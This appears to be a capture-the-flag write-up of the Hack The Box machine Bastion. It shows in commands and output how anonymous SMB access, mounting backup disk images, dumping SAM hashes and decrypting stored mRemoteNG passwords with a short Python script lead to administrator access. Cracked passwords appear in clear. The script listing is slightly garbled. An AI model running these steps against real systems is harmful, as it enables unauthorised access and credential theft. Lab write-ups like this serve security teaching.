┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.134
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 (93%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-01-13T08:33:59
|_ start_date: 2024-01-13T03:25:59
|_clock-skew: mean: -20m00s, deviation: 34m36s, median: -2s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-01-13T09:33:57+01:00
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.36 seconds
Microsoft Windows RPC:
Before checking in the shares, I want to see if I can also get an anonymous session over RPC.
┌──(kali💀kali)-[~]
└─$ rpcclient 10.10.10.134 -U ""
Password for [WORKGROUP\]:
Sure enough it works for RPC as well, and testing the srvinfo command, I was able to get information about the system.
rpcclient $> srvinfo
10.10.10.134 Wk Sv NT SNT
platform_id : 500
os version : 10.0
server type : 0x9003
As a result of both services allowing anonymous acces, I decided to run enum4linux to gather info on the system while I manually check the Backups share.
┌──(kali💀kali)-[~]
└─$ enum4linux -a 10.10.10.134
============================( Enumerating Workgroup/Domain on 10.10.10.134 )============================
[E] Can't find workgroup/domain
================================( Nbtstat Information for 10.10.10.134 )================================
Looking up status of 10.10.10.134
No reply from 10.10.10.134
===================================( Session Check on 10.10.10.134 )===================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
However, the enum4linux scan was not able to connect for some reason, so I will continue with enumerating the Backups share and then enumerate RPC manually if needed.
Enumeration: SMB Port 139/445/tcp
smbmap doesn’t give me much with a normal run, but will with a bad user name:
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.134 -u exodus
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[/] Auth[!] Unable to remove test file at \\10.10.10.134\Backups\ACQVOFRIGM.txt, please remove manually
[+] IP: 10.10.10.134:445 Name: 10.10.10.134 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Backups READ, WRITE
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
smbclient shows me the Backups share as well:
┌──(kali💀kali)-[~]
└─$ smbclient -N -L //10.10.10.134
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Backups Share:
Connecting to Backups, I see two files and a directory:
┌──(kali💀kali)-[~]
└─$ smbclient -N //10.10.10.134/backups
smb: \> ls
. D 0 Sat Jan 13 04:16:54 2024
.. D 0 Sat Jan 13 04:16:54 2024
ACQVOFRIGM.txt A 0 Sat Jan 13 04:16:54 2024
note.txt AR 116 Tue Apr 16 06:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 07:44:02 2019
5638911 blocks of size 4096. 1173744 blocks available
Once in the share I decided to grab all the files inside (big mistake – do NOT do this – mount it instead (instructions below))
┌──(kali💀kali)-[~]
└─$ prompt off
recurse on
mget *
The two virtual hard disk files are HUGE and were taking a long time to download, so I decided to check the other files that downloaded already while I wait. Starting with note.exe…
cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
A Windows Image Backup is likely to be large and the transfer will be slow (as the note warns). Rather than try to copy it over, I’m going to mount this share to my filesystem. NOTE – To mount the share rather than downloading these huge files, use the following commands:
┌──(kali💀kali)-[~]
└─$ mount -t cifs //10.10.10.134/backups /mnt -o user=,password=
┌──(kali💀kali)-[~]
└─$ ls /mnt/
I’ll list all the files in the share:
┌──(kali💀kali)-[~]
└─$ find /mnt/ -type f
I see two disk image vhd files.
Mount vhd:
I’m going to mount the virtual disk files and see what I can find in them. First, I’ll install guestmount with apt install libguestfs-tools, a tool for mounting virtual hard disk files on Linux.
Dump Hashes From Registry:
With full access to the file system, I have access to the registry files. These files can be locked when the system is running, but I won’t have that issue on a mounted drive. In the config directory where the registry hives are stored, I’ll use secretsdump.py to dump the password hashes:
┌──(kali💀kali)-[~/Desktop]
└─$ secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
I’ll also notice that secretsdump.py identified a default password (or autolongon password) of “bureaulampje” for an unknown user.
Crack Hash:
Submitting the NTLM hashes to crackstation returns the same password for the l4mpje account:
bureaulampje
SSH:
Seeing ssh on a Windows box is a bit unusual, but this seems like a good chance to use it. I can ssh in as l4mpje:
In looking at the installed programs on the host, mRemoteNG jumps out as interesting:
PS C:\Program Files (x86)> dir
mRemoteNG is a remote connection management tool, and it allows the user to save passwords for various types of connections. There is a file in the user’s AppData directory, confCons.xml, that holds that information:
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG> dir
22-02-2019 15:03 6.316 confCons.xml
It’s xml, with encrypted versions of the passwords stored in the file:
I solved this box right when it was released, and the above file is what it was at that time. It seems that the file has been changed since then. It doesn’t matter, the results are the same. But if you see different values from what I have, that is why. The resulting passwords will be the same.
Extract Passwords:
Old Techniques
There’s a lot of articles like this and this that target an older version of the software that used a static key to decrypt the passwords. The Metasploit module abuses this as well. Starting in version 1.76, the use can now choose a master password, but there is still a default password or “mR3m”. But, the default AES block mode also changed, which leaves all the older tools still incapabile of decrpyting newer files.
Method 1: From Within mRemoteNG
I’ll open my Commando VM and install mRemoteNG. Then I’ll drop the confCons.xml file from target into C:\Users\0xdf\AppData\Roaming\mRemoteNG and re-open mRemoteNG. I’ll see two connections listed:
mRemoteNG doesn’t want to just tell me the passwords. However, I can use the fact that the program wants to allow me to connect it to external tools that it may not be pre-programed to work with by creating a new External Tool by going to Tools -> External Tools -> New External Tool. In the Window that opens, I’ll add a display name, filename, and arguments as follows:
My external tool is just cmd, and I have it running an echo with the username and password. Now I can right-click on a connection, go to External Tools, and Password is an option: Clicking it pops a cmd window with the password at the top: The password for L4mpje matches what I already know. The password for DC is new:
Now I have the administrtor password, “thXLHM96BeKL0ER2”.
Method 2: mremoteng-decrypt
Around the time Bastion came out, mremoteng-decrypt showed up on GitHub. At the time, there was only a java release, which I downloaded and ran here, and it worked:
root@kali:/opt/mremoteng-decrypt# java -jar decipher_mremoteng.jar OuhzIwEZtD30y9QFzUOGDDoHnaSWGQFHcD5YSnj/YoJ2sE41GLoykzMgEAZh940z8pKetHSQDonI5/z7
User Input: OuhzIwEZtD30y9QFzUOGDDoHnaSWGQFHcD5YSnj/YoJ2sE41GLoykzMgEAZh940z8pKetHSQDonI5/z7
Use default password for cracking...
Decrypted Output: bureaulampje
root@kali:/opt/mremoteng-decrypt# java -jar decipher_mremoteng.jar V22XaC5eW4epRxRgXEM5RjuQe2UNrHaZSGMUenOvA1Cit/z3v1fUfZmGMglsiaICSus+bOwJQ/4AnYAt2AeE8g==
User Input: V22XaC5eW4epRxRgXEM5RjuQe2UNrHaZSGMUenOvA1Cit/z3v1fUfZmGMglsiaICSus+bOwJQ/4AnYAt2AeE8g==
Use default password for cracking...
Decrypted Output: thXLHM96BeKL0ER2
I see now that there is a python script as well, though I haven’t played with it.
Method 3: Script It
At the time I was solving, there was only a java version on that GitHub, and I wanted a python version. So I wrote a quick script:
1#!/usr/bin/env python323import base644import hashlib5import re6import sys7from Cryptodome.Cipher import AES89iflen(sys.argv)!=2:10print(f"[-] Usage: {sys.argv[0]} [confCons.xml]")11 sys.exit()1213try:14withopen(sys.argv[1], 'r')as f:15 conf = f.read()16exceptFileNotFoundError:17print(f"[-] Unable to open {sys.argv[1]}")18 sys.exit()1920 mode = re.findall('BlockCipherMode="(\w+)"', conf)21iflen(mode)!=1:22print("[-] Warning - No BlockCipherMode detected")23elif mode[0]!='GCM':24print(f"[-] Warning - This script is for AES GCM Mode. {mode} detected")2526 nodes = re.findall('<Node .+/>', conf)27iflen(nodes)>0:28print(f"[+] Found nodes: {len(nodes)}\n")29else:30print("[-] Found no nodes")3132for node in nodes:33 user = re.findall(' Username="(\w*)"', node)[0]34 enc = base64.b64decode(re.findall(' Password="([^ ]+)"', node)[0])35 salt = enc[:16]36 nonce = enc[16:32]37 cipher = enc[32:-16]38 tag = enc[-16:]39 key = hashlib.pbkdf2_hmac("sha1", b"mR3m", salt, 1000, dklen=32)40 aes = AES.new(key, AES.MODE_GCM, nonce=nonce)41 aes.update(salt)42 password = aes.decrypt_and_verify(cipher, tag).decode()43print(f"Username: {user}\nPassword: {password}\n")
It takes a consCons.xml file, and prints all the decrpyted passwords it can find.
administrator@BASTION C:\Users\Administrator>systeminfo
Host Name: BASTION
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00376-30821-30176-AA445
Original Install Date: 22-2-2019, 12:36:53
System Boot Time: 13-1-2024, 04:25:37
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12-12-2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: nl;Dutch (Netherlands)
Input Locale: en-us;English (United States)
Time Zone: (UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna
Total Physical Memory: 4.095 MB
Available Physical Memory: 3.043 MB
Virtual Memory: Max Size: 6.849 MB
Virtual Memory: Available: 5.729 MB
Virtual Memory: In Use: 1.120 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 3 Hotfix(s) Installed.
[01]: KB3192137
[02]: KB4485447
[03]: KB4487006
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.134
[02]: fe80::4ccf:8d87:55e6:b8cb
[03]: dead:beef::4ccf:8d87:55e6:b8cb
[04]: dead:beef::101
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not
be displayed.
administrator@BASTION C:\Users\Administrator> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description
State
========================================= =======================================================
=========== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process
Enabled
SeSecurityPrivilege Manage auditing and security log
Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects
Enabled
SeLoadDriverPrivilege Load and unload device drivers
Enabled
SeSystemProfilePrivilege Profile system performance
Enabled
SeSystemtimePrivilege Change the system time
Enabled
SeProfileSingleProcessPrivilege Profile single process
Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority
Enabled
SeCreatePagefilePrivilege Create a pagefile
Enabled
SeBackupPrivilege Back up files and directories
Enabled
SeRestorePrivilege Restore files and directories
Enabled
SeShutdownPrivilege Shut down the system
Enabled
SeDebugPrivilege Debug programs
Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values
Enabled
SeChangeNotifyPrivilege Bypass traverse checking
Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system
Enabled
SeUndockPrivilege Remove computer from docking station
Enabled
SeManageVolumePrivilege Perform volume maintenance tasks
Enabled
SeImpersonatePrivilege Impersonate a client after authentication
Enabled
SeCreateGlobalPrivilege Create global objects
Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set
Enabled
SeTimeZonePrivilege Change the time zone
Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links
Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the s
ame session Enabled
administrator@BASTION C:\Users\Administrator>net users
User accounts for \\BASTION
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
L4mpje
The command completed successfully.
